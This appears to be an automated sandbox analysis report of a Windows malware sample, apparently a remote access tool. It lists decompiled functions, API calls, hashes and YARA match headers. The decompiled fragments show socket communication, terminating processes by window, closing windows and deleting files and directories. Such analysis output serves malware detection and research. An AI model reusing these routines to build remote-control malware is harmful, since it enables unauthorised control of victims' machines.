                                                                                • Opcode ID: 9e51f500d0127f4068dc5164bc671e9d3acc2eedac6701e81ae34b3092b06bc0
                                                                                • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                                                                • Opcode Fuzzy Hash: 9e51f500d0127f4068dc5164bc671e9d3acc2eedac6701e81ae34b3092b06bc0
                                                                                • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00405C62(void* __ecx) {
                                                                                				long _t7;
                                                                                				void* _t10;
                                                                                				void* _t18;
                                                                                				void* _t19;
                                                                                
                                                                                				_t18 = __ecx;
                                                                                				_t7 = CreateEventA(0, 0, 0, 0);
                                                                                				 *(_t18 + 0x34) = _t7;
                                                                                				if( *((char*)(_t18 + 0x3d)) != 0) {
                                                                                					_t10 = _t18 + 0x14;
                                                                                					do {
                                                                                						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
                                                                                						if(_t7 != 0) {
                                                                                							_t19 = _t19 - 0x10;
                                                                                							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                							E004020C2(0x41be70, 0x5a, _t10);
                                                                                							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                                                                						}
                                                                                						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
                                                                                					} while ( *((char*)(_t18 + 0x3d)) != 0);
                                                                                				}
                                                                                				return 1;
                                                                                			}








                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                                                                • String ID:
                                                                                • API String ID: 2456067102-0
                                                                                • Opcode ID: 45bae59f47134ab90163eaec70089cb8538b3c20a9b70c8c16acf7688f10fafe
                                                                                • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                                                                • Opcode Fuzzy Hash: 45bae59f47134ab90163eaec70089cb8538b3c20a9b70c8c16acf7688f10fafe
                                                                                • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 1435062097-0
                                                                                • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                                                                • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                                                                • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                                                                • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00409B39,6D1BCB60), ref: 00412B5E
                                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 788797586-0
                                                                                • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                                                                • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                                                                • String ID:
                                                                                • API String ID: 1622488342-0
                                                                                • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                                                                • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                                                                • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                                                                • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • #23.WS2_32(00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402530
                                                                                • #4.WS2_32(00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 0040253F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                • #3.WS2_32(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 0040256A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 382206802-0
                                                                                • Opcode ID: ff0d08c1f2d9e04991a286ac1f1375558555305bcc3669552e4a5ed2cd95820b
                                                                                • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                                                                • Opcode Fuzzy Hash: ff0d08c1f2d9e04991a286ac1f1375558555305bcc3669552e4a5ed2cd95820b
                                                                                • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E0040D817(void* __eflags) {
                                                                                				char* _t8;
                                                                                				void* _t25;
                                                                                
                                                                                				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
                                                                                				E004126BC( *(_t25 - 0x2c));
                                                                                				E0040EBBE();
                                                                                				E004017DD(_t25 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}






                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                                                                • atoi.MSVCRT ref: 0040D82E
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                                                                  • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                                                                  • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                                                                  • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                                                                  • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                                                                  • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                                                                  • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                                                                • String ID:
                                                                                • API String ID: 2919580351-0
                                                                                • Opcode ID: da5b9d8ba5108d0d5b7e9ed95e56d40ae97cd0c43d808eb93a2ccecde43080ad
                                                                                • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                                                                • Opcode Fuzzy Hash: da5b9d8ba5108d0d5b7e9ed95e56d40ae97cd0c43d808eb93a2ccecde43080ad
                                                                                • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                                                                • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,000192D2), ref: 00412140
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                                                                • String ID:
                                                                                • API String ID: 758954411-0
                                                                                • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                                                                • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                                                                • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                                                                • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                                                                • atoi.MSVCRT ref: 0040E4B9
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                                                                • String ID:
                                                                                • API String ID: 4290155986-0
                                                                                • Opcode ID: e99a79710fca12779304e92261ca3e34d058ff210406a7cbc726353d7f4acda6
                                                                                • Instruction ID: 20fcfc763774574552f6a97477b9112486ef0cdd22c9f36fb94fc0668df3d9e8
                                                                                • Opcode Fuzzy Hash: e99a79710fca12779304e92261ca3e34d058ff210406a7cbc726353d7f4acda6
                                                                                • Instruction Fuzzy Hash: 05E0C932A10618CBDB04ABE1EC5DAEDB734FB94316F10883AE113A60E1EBB85555DA19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                                                                • atoi.MSVCRT ref: 0040E4B9
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                                                                • String ID:
                                                                                • API String ID: 4290155986-0
                                                                                • Opcode ID: 013d18ed588bbcce2ce0616672a886baf0321ee75f897beb4599dd8eacd2935d
                                                                                • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                                                                • Opcode Fuzzy Hash: 013d18ed588bbcce2ce0616672a886baf0321ee75f897beb4599dd8eacd2935d
                                                                                • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 25%
                                                                                			E00406CFF(WCHAR* __eax, void* __ecx) {
                                                                                				WCHAR* _t5;
                                                                                				signed int _t8;
                                                                                				signed int _t9;
                                                                                				void* _t15;
                                                                                
                                                                                				_t15 = __ecx;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t5 = DeleteFileW(__eax);
                                                                                				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
                                                                                				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
                                                                                				if(_t5 != 0) {
                                                                                					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                					RemoveDirectoryW(_t5);
                                                                                				}
                                                                                				return _t9;
                                                                                			}








                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                                                                • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 1823182134-0
                                                                                • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                                                                • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                                                                • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                                                                • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 46%
                                                                                			E0040D7E4(void* __eflags) {
                                                                                				char* _t5;
                                                                                				void* _t19;
                                                                                
                                                                                				_t5 = E0040180C(_t19 - 0x10, __eflags, 0);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				CloseWindow(atoi(_t5));
                                                                                				E004017DD(_t19 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}






                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7F0
                                                                                • atoi.MSVCRT ref: 0040D7F7
                                                                                • CloseWindow.USER32 ref: 0040D7FF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                                                                • String ID:
                                                                                • API String ID: 14144500-0
                                                                                • Opcode ID: 568f6e9f52c965c84b16da47c298b7d3f906b9136efd7e5a31036de184f57127
                                                                                • Instruction ID: fbc29b80efd9e4125448cee2552d84d25da0c547aa8720e2220b6587ca76b5c9
                                                                                • Opcode Fuzzy Hash: 568f6e9f52c965c84b16da47c298b7d3f906b9136efd7e5a31036de184f57127
                                                                                • Instruction Fuzzy Hash: 26E0E532910518CBDB04ABF1EC5DAEDB734FB90316B00883AE012E30E0EF785945CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                                                                • String ID:
                                                                                • API String ID: 1976170855-0
                                                                                • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                                                                • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                                                                • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                                                                • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
